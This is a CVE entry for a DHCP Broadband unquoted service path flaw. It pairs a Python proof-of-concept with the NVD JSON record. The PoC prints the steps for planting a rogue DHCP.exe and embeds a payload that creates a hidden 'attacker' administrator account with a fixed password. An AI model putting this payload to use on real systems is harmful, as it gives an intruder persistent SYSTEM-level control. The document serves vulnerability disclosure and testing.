CVE-2021-47829

#!/usr/bin/env python3 """ CVE-2021-47829 PoC - DHCP Broadband Unquoted Service Path Privilege Escalation This script demonstrates the unquoted service path vulnerability in DHCP Broadband 4.1.0.1503 Note: This PoC is for educational and authorized testing purposes only. """ import os import sys import ctypes import shutil def is_admin(): """Check if the script is running with administrator privileges.""" try: return ctypes.windll.shell32.IsUserAnAdmin() except: return False def check_vulnerable_service(): """Check if the vulnerable DHCP Broadband service exists.""" service_path = r'C:\Program Files\DHCP Broadband 4\dhcpt.exe' return os.path.exists(service_path) def create_malicious_executable(): """ Create a malicious executable that will be placed in the unquoted path. This example creates a simple reverse shell or adds an admin user. """ malicious_code = ''' import os import sys import subprocess # Create a new administrator user for demonstration # In real attack, this would be a reverse shell or other malicious payload try: # Add new admin user (for educational purposes only) subprocess.run(['net', 'user', 'attacker', 'P@ssw0rd123', '/add'], capture_output=True) subprocess.run(['net', 'localgroup', 'Administrators', 'attacker', '/add'], capture_output=True) print("[+] Malicious code executed with LocalSystem privileges") except Exception as e: print(f"[-] Error: {e}") ''' # In a real scenario, this would be compiled to an executable # For demonstration, we show the concept print("[*] Malicious executable concept created") return malicious_code def exploit(): """Main exploitation function.""" print("[*] CVE-2021-47829 - DHCP Broadband Unquoted Service Path Exploit") print("[*] Target: C:\\Program Files\\DHCP Broadband 4\\dhcpt.exe") if not is_admin(): print("[-] This exploit requires administrator privileges for service enumeration") print("[*] However, the actual exploitation only requires write access to Program Files") if not check_vulnerable_service(): print("[-] Vulnerable service not found. Target may not be affected.") return False print("[+] Vulnerable service detected!") print("[*] Attack vector:") print(" 1. Create malicious executable named 'DHCP.exe'") print(" 2. Place it in 'C:\\Program Files\\'") print(" 3. Wait for service restart or system reboot") print(" 4. Malicious code executes with LocalSystem privileges") # Demonstrate the concept (actual file creation would be malicious) create_malicious_executable() return True if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2021-47829", "sourceIdentifier": "[email protected]", "published": "2026-01-16T19:16:08.043", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "DHCP Broadband 4.1.0.1503 contains an unquoted service path vulnerability in its service configuration that allows local attackers to execute code with elevated privileges. Attackers can exploit the unquoted path in 'C:\\Program Files\\DHCP Broadband 4\\dhcpt.exe' to inject malicious code that will execute during service startup with LocalSystem permissions."}, {"lang": "es", "value": "DHCP Broadband 4.1.0.1503 contiene una vulnerabilidad de ruta de servicio sin comillas en su configuración de servicio que permite a atacantes locales ejecutar código con privilegios elevados. Los atacantes pueden explotar la ruta sin comillas en 'C:\\Program Files\\DHCP Broadband 4\\dhcpt.exe' para inyectar código malicioso que se ejecutará durante el inicio del servicio con permisos de LocalSystem."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/49850", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/dhcp-broadband-dhcptexe-unquoted-service-path", "source": "[email protected]"}, {"url": "https://www.weird-solutions.com", "source": "[email protected]"}]}}